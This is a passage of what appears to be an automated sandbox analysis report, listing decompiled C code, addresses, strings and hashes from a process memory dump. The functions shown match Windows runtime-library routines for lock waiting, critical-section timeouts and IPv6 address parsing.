                                                                                                                                                        												E00903915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        												_push( &_a4);
                                                                                                                                                        												_push(1);
                                                                                                                                                        												_t42 = E008BF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        												__eflags = _t42;
                                                                                                                                                        												if(__eflags >= 0) {
                                                                                                                                                        													goto L2;
                                                                                                                                                        												} else {
                                                                                                                                                        													_push(_t42);
                                                                                                                                                        													_t45 = E00903915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                        													asm("int3");
                                                                                                                                                        													while(1) {
                                                                                                                                                        														_t74 = _t45;
                                                                                                                                                        														__eflags = _t45 - 1;
                                                                                                                                                        														if(_t45 != 1) {
                                                                                                                                                        															break;
                                                                                                                                                        														}
                                                                                                                                                        														_t86 = _t86 | 0xffffffff;
                                                                                                                                                        														_t45 = _t74;
                                                                                                                                                        														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                        														__eflags = _t45 - _t74;
                                                                                                                                                        														if(_t45 != _t74) {
                                                                                                                                                        															continue;
                                                                                                                                                        														} else {
                                                                                                                                                        															_t46 =  *[fs:0x18];
                                                                                                                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                        															return _t46;
                                                                                                                                                        														}
                                                                                                                                                        														goto L38;
                                                                                                                                                        													}
                                                                                                                                                        													E008E5329(_t74, _t92);
                                                                                                                                                        													_push(1);
                                                                                                                                                        													_t48 = E008E53A5(_t92);
                                                                                                                                                        													return _t48;
                                                                                                                                                        												}
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        								} else {
                                                                                                                                                        									_t32 =  *(_t64 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t71 =  *_t79;
                                                                                                                                                        								__eflags = _t71;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t57 = _t71;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t57 - _t71;
                                                                                                                                                        										if(_t57 == _t71) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t71 = _t57;
                                                                                                                                                        										__eflags = _t57;
                                                                                                                                                        										if(_t57 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t32 = _a4;
                                                                                                                                                        									__eflags = _t71;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L19;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L38;
                                                                                                                                                        					}
                                                                                                                                                        					_t71 = _t71 | 0xffffffff;
                                                                                                                                                        					_t32 = 0;
                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                        					__eflags = 0;
                                                                                                                                                        					if(0 != 0) {
                                                                                                                                                        						goto L4;
                                                                                                                                                        					} else {
                                                                                                                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L38:
                                                                                                                                                        			}


























                                                                                                                                                        0x009223cb
                                                                                                                                                        0x009223ce
                                                                                                                                                        0x009223d7
                                                                                                                                                        0x009223d7
                                                                                                                                                        0x009223ad
                                                                                                                                                        0x00922390
                                                                                                                                                        0x00922373
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x00922291
                                                                                                                                                        0x00922291
                                                                                                                                                        0x00922293
                                                                                                                                                        0x00922295
                                                                                                                                                        0x0092229a
                                                                                                                                                        0x009222a1
                                                                                                                                                        0x009222a3
                                                                                                                                                        0x009222a7
                                                                                                                                                        0x009222a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222ab
                                                                                                                                                        0x009222ad
                                                                                                                                                        0x009222af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222af
                                                                                                                                                        0x009222b1
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x0092228f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092226d
                                                                                                                                                        0x008e53cb
                                                                                                                                                        0x008e53ce
                                                                                                                                                        0x008e53d0
                                                                                                                                                        0x008e53d4
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53d8
                                                                                                                                                        0x008e53e3
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009222F4
                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009222FC
                                                                                                                                                        • RTL: Resource at %p, xrefs: 0092230B
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 00922328
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                        • Opcode ID: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
                                                                                                                                                        • Instruction ID: 146231664f337d54ada5b514624ca4cd9e6bdcc1f33c7041862d277fd9fddd68
                                                                                                                                                        • Opcode Fuzzy Hash: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
                                                                                                                                                        • Instruction Fuzzy Hash: D9513771600715ABEB14DB29DC81FA673ACFF96764F104229FD14DB381EA71EC4287A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E008EEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                        				signed int _v36;
                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                        				short _v66;
                                                                                                                                                        				char _v72;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                        				signed int _t44;
                                                                                                                                                        				void* _t46;
                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                        				signed char _t67;
                                                                                                                                                        				void* _t72;
                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                        				void* _t91;
                                                                                                                                                        				void* _t92;
                                                                                                                                                        				void* _t93;
                                                                                                                                                        
                                                                                                                                                        				_t80 = __edi;
                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                        				_t70 = __ecx;
                                                                                                                                                        				_t84 = _a4;
                                                                                                                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                        					E008DDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                        				}
                                                                                                                                                        				_push(0);
                                                                                                                                                        				__eflags = _t38 - 0xffffffff;
                                                                                                                                                        				if(_t38 == 0xffffffff) {
                                                                                                                                                        					_t39 =  *0x9a793c; // 0x0
                                                                                                                                                        					_push(0);
                                                                                                                                                        					_push(_t84);
                                                                                                                                                        					_t40 = E008C16C0(_t39);
                                                                                                                                                        				} else {
                                                                                                                                                        					_t40 = E008BF9D4(_t38);
                                                                                                                                                        				}
                                                                                                                                                        				_pop(_t85);
                                                                                                                                                        				__eflags = _t40;
                                                                                                                                                        				if(__eflags < 0) {
                                                                                                                                                        					_push(_t40);
                                                                                                                                                        					E00903915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                        					asm("int3");
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L21:
                                                                                                                                                        						_t76 =  *[fs:0x18];
                                                                                                                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                        							_v66 = 0x1722;
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_t76 =  &_v72;
                                                                                                                                                        							_push( &_v72);
                                                                                                                                                        							_v28 = _t85;
                                                                                                                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(0x10);
                                                                                                                                                        							_push(0x20402);
                                                                                                                                                        							E008C01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_t43 = _v8;
                                                                                                                                                        							_push(_t80);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							__eflags = _t43 - 0xffffffff;
                                                                                                                                                        							if(_t43 == 0xffffffff) {
                                                                                                                                                        								_t71 =  *0x9a793c; // 0x0
                                                                                                                                                        								_push(_t85);
                                                                                                                                                        								_t44 = E008C1F28(_t71);
                                                                                                                                                        							} else {
                                                                                                                                                        								_t44 = E008BF8CC(_t43);
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t44 - 0x102;
                                                                                                                                                        							if(_t44 != 0x102) {
                                                                                                                                                        								__eflags = _t44;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t44);
                                                                                                                                                        									E00903915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									E00942306(_t85);
                                                                                                                                                        									__eflags = _t67 & 0x00000002;
                                                                                                                                                        									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                        										_t7 = _t67 + 2; // 0x4
                                                                                                                                                        										_t72 = _t7;
                                                                                                                                                        										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                        										__eflags = _t67 - _t67;
                                                                                                                                                        										if(_t67 == _t67) {
                                                                                                                                                        											E008EEC56(_t72, _t76, _t80, _t85);
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									__eflags = _v24;
                                                                                                                                                        									if(_v24 != 0) {
                                                                                                                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                        									}
                                                                                                                                                        									return 2;
                                                                                                                                                        								}
                                                                                                                                                        								goto L36;
                                                                                                                                                        							}
                                                                                                                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                        							_push(_t67);
                                                                                                                                                        							_t46 = E00904FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                        							_push(_t77);
                                                                                                                                                        							E00913F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                        							_t48 =  *_t85;
                                                                                                                                                        							_t92 = _t91 + 0x18;
                                                                                                                                                        							__eflags = _t48 - 0xffffffff;
                                                                                                                                                        							if(_t48 == 0xffffffff) {
                                                                                                                                                        								_t49 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(_t49);
                                                                                                                                                        							_t50 = _v12;
                                                                                                                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                        							_push(_t85);
                                                                                                                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                        							E00913F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                        							_t53 =  *_t85;
                                                                                                                                                        							_t93 = _t92 + 0x20;
                                                                                                                                                        							_t67 = _t67 + 1;
                                                                                                                                                        							__eflags = _t53 - 0xffffffff;
                                                                                                                                                        							if(_t53 != 0xffffffff) {
                                                                                                                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t67 - 2;
                                                                                                                                                        							if(_t67 > 2) {
                                                                                                                                                        								__eflags = _t85 - 0x9a20c0;
                                                                                                                                                        								if(_t85 != 0x9a20c0) {
                                                                                                                                                        									_t76 = _a4;
                                                                                                                                                        									__eflags = _a4 - _a8;
                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                        										E0094217A(_t71, __eflags, _t85);
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							_push("RTL: Re-Waiting\n");
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push(0x65);
                                                                                                                                                        							_a8 = _a4;
                                                                                                                                                        							E00913F92();
                                                                                                                                                        							_t91 = _t93 + 0xc;
                                                                                                                                                        							__eflags =  *0x7ffe0382;
                                                                                                                                                        							if( *0x7ffe0382 != 0) {
                                                                                                                                                        								goto L21;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L36;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t40;
                                                                                                                                                        				}
                                                                                                                                                        				L36:
                                                                                                                                                        			}

































                                                                                                                                                        0x009224ec
                                                                                                                                                        0x009224ef
                                                                                                                                                        0x009224f2
                                                                                                                                                        0x009224f2
                                                                                                                                                        0x009224ef
                                                                                                                                                        0x009224e7
                                                                                                                                                        0x009224fa
                                                                                                                                                        0x009224ff
                                                                                                                                                        0x00922501
                                                                                                                                                        0x00922503
                                                                                                                                                        0x00922506
                                                                                                                                                        0x0092250b
                                                                                                                                                        0x008eeb8c
                                                                                                                                                        0x008eeb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008eeb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008eeb99
                                                                                                                                                        0x008eec85
                                                                                                                                                        0x008eec85
                                                                                                                                                        0x008eec85
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009224BD
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0092248D
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 009224FA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
                                                                                                                                                        • Instruction ID: 7fed8ecd225f7c452b8550a1e146dc44be2ed6bb4e60e0a285cc7c9590204f12
                                                                                                                                                        • Opcode Fuzzy Hash: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
                                                                                                                                                        • Instruction Fuzzy Hash: 4F41D570600214BBDB20EFA9DC85FAA77B8FF85720F208619F565DB3D1D634E9418761
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E008FFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _t105;
                                                                                                                                                        				void* _t110;
                                                                                                                                                        				char _t114;
                                                                                                                                                        				short _t115;
                                                                                                                                                        				void* _t118;
                                                                                                                                                        				signed short* _t119;
                                                                                                                                                        				short _t120;
                                                                                                                                                        				char _t122;
                                                                                                                                                        				void* _t127;
                                                                                                                                                        				void* _t130;
                                                                                                                                                        				signed int _t136;
                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                        				signed int _t158;
                                                                                                                                                        				signed short* _t164;
                                                                                                                                                        				signed int _t167;
                                                                                                                                                        				void* _t170;
                                                                                                                                                        
                                                                                                                                                        				_t158 = 0;
                                                                                                                                                        				_t164 = _a4;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				_v24 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_t136 = 0;
                                                                                                                                                        				while(1) {
                                                                                                                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                        					if(_t167 == _t158) {
                                                                                                                                                        						break;
                                                                                                                                                        					}
                                                                                                                                                        					_t118 = _v20 - _t158;
                                                                                                                                                        					if(_t118 == 0) {
                                                                                                                                                        						if(_t167 == 0x3a) {
                                                                                                                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                        								break;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t119 =  &(_t164[1]);
                                                                                                                                                        								if( *_t119 != _t167) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_t143 = 2;
                                                                                                                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                        								_v28 = 1;
                                                                                                                                                        								_v8 = _t143;
                                                                                                                                                        								_t136 = _t136 + 1;
                                                                                                                                                        								L47:
                                                                                                                                                        								_t164 = _t119;
                                                                                                                                                        								_v20 = _t143;
                                                                                                                                                        								L14:
                                                                                                                                                        								if(_v24 == _t158) {
                                                                                                                                                        									L19:
                                                                                                                                                        									_t164 =  &(_t164[1]);
                                                                                                                                                        									_t158 = 0;
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v12 == _t158) {
                                                                                                                                                        									if(_v16 > 4) {
                                                                                                                                                        										L29:
                                                                                                                                                        										return 0xc000000d;
                                                                                                                                                        									}
                                                                                                                                                        									_t120 = E008FEE02(_v24, _t158, 0x10);
                                                                                                                                                        									_t170 = _t170 + 0xc;
                                                                                                                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                        									_t136 = _t136 + 1;
                                                                                                                                                        									goto L19;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v16 > 3) {
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								_t122 = E008FEE02(_v24, _t158, 0xa);
                                                                                                                                                        								_t170 = _t170 + 0xc;
                                                                                                                                                        								if(_t122 > 0xff) {
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                        								goto L19;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						L21:
                                                                                                                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                        							break;
                                                                                                                                                        						} else {
                                                                                                                                                        							if(E008F685D(_t167, 4) == 0) {
                                                                                                                                                        								if(E008F685D(_t167, 0x80) != 0) {
                                                                                                                                                        									if(_v12 > 0) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t127 = 1;
                                                                                                                                                        									_a7 = 1;
                                                                                                                                                        									_v24 = _t164;
                                                                                                                                                        									_v20 = 1;
                                                                                                                                                        									_v16 = 1;
                                                                                                                                                        									L36:
                                                                                                                                                        									if(_v20 == _t127) {
                                                                                                                                                        										goto L19;
                                                                                                                                                        									}
                                                                                                                                                        									_t158 = 0;
                                                                                                                                                        									goto L14;
                                                                                                                                                        								}
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							_a7 = 0;
                                                                                                                                                        							_v24 = _t164;
                                                                                                                                                        							_v20 = 1;
                                                                                                                                                        							_v16 = 1;
                                                                                                                                                        							goto L19;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t130 = _t118 - 1;
                                                                                                                                                        					if(_t130 != 0) {
                                                                                                                                                        						if(_t130 == 1) {
                                                                                                                                                        							goto L21;
                                                                                                                                                        						}
                                                                                                                                                        						_t127 = 1;
                                                                                                                                                        						goto L36;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t167 >= 0x80) {
                                                                                                                                                        						L7:
                                                                                                                                                        						if(_t167 == 0x3a) {
                                                                                                                                                        							_t158 = 0;
                                                                                                                                                        							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                        								break;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t119 =  &(_t164[1]);
                                                                                                                                                        								if( *_t119 != _t167) {
                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                        									L13:
                                                                                                                                                        									_v20 = _t158;
                                                                                                                                                        									goto L14;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v28 != 0) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_v28 = _v8 + 1;
                                                                                                                                                        								_t143 = 2;
                                                                                                                                                        								_v8 = _v8 + _t143;
                                                                                                                                                        								goto L47;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                        							break;
                                                                                                                                                        						} else {
                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                        							_t158 = 0;
                                                                                                                                                        							goto L13;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					if(E008F685D(_t167, 4) != 0) {
                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                        						goto L19;
                                                                                                                                                        					}
                                                                                                                                                        					if(E008F685D(_t167, 0x80) != 0) {
                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                        						if(_v12 > 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						_a7 = 1;
                                                                                                                                                        						goto L19;
                                                                                                                                                        					}
                                                                                                                                                        					goto L7;
                                                                                                                                                        				}
                                                                                                                                                        				 *_a8 = _t164;
                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                        					if(_v12 != 3) {
                                                                                                                                                        						goto L29;
                                                                                                                                                        					}
                                                                                                                                                        					_v8 = _v8 + 1;
                                                                                                                                                        				}
                                                                                                                                                        				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                        					if(_v20 != 1) {
                                                                                                                                                        						if(_v20 != 2) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                        						L65:
                                                                                                                                                        						_t105 = _v28;
                                                                                                                                                        						if(_t105 != 0) {
                                                                                                                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                        							E008D8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                        							_t110 = 8;
                                                                                                                                                        							E008CDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                        						}
                                                                                                                                                        						return 0;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                        						if(_v16 > 3) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						_t114 = E008FEE02(_v24, 0, 0xa);
                                                                                                                                                        						_t170 = _t170 + 0xc;
                                                                                                                                                        						if(_t114 > 0xff) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                        						goto L65;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v16 > 4) {
                                                                                                                                                        						goto L29;
                                                                                                                                                        					}
                                                                                                                                                        					_t115 = E008FEE02(_v24, 0, 0x10);
                                                                                                                                                        					_t170 = _t170 + 0xc;
                                                                                                                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                        					goto L65;
                                                                                                                                                        				} else {
                                                                                                                                                        					goto L29;
                                                                                                                                                        				}
                                                                                                                                                        			}

























                                                                                                                                                        0x008ffd73
                                                                                                                                                        0x008ffd73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd73
                                                                                                                                                        0x0092ec95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eca1
                                                                                                                                                        0x0092eca4
                                                                                                                                                        0x0092eca5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eca5
                                                                                                                                                        0x0092ec7a
                                                                                                                                                        0x008ffd4a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd6e
                                                                                                                                                        0x008ffd6e
                                                                                                                                                        0x008ffd71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd71
                                                                                                                                                        0x008ffd4a
                                                                                                                                                        0x008ffd21
                                                                                                                                                        0x0090a3a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090a3a1
                                                                                                                                                        0x008ffd36
                                                                                                                                                        0x0091200b
                                                                                                                                                        0x00912012
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00912018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00912018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd36
                                                                                                                                                        0x008ffe0f
                                                                                                                                                        0x008ffe16
                                                                                                                                                        0x0090a3ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090a3b3
                                                                                                                                                        0x0090a3b3
                                                                                                                                                        0x008ffe1f
                                                                                                                                                        0x0092ed25
                                                                                                                                                        0x0092ed86
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed91
                                                                                                                                                        0x0092ed95
                                                                                                                                                        0x0092ed95
                                                                                                                                                        0x0092ed9a
                                                                                                                                                        0x0092edad
                                                                                                                                                        0x0092edb3
                                                                                                                                                        0x0092edba
                                                                                                                                                        0x0092edc4
                                                                                                                                                        0x0092edc9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092edcc
                                                                                                                                                        0x0092ed2a
                                                                                                                                                        0x0092ed55
                                                                                                                                                        0x00000000
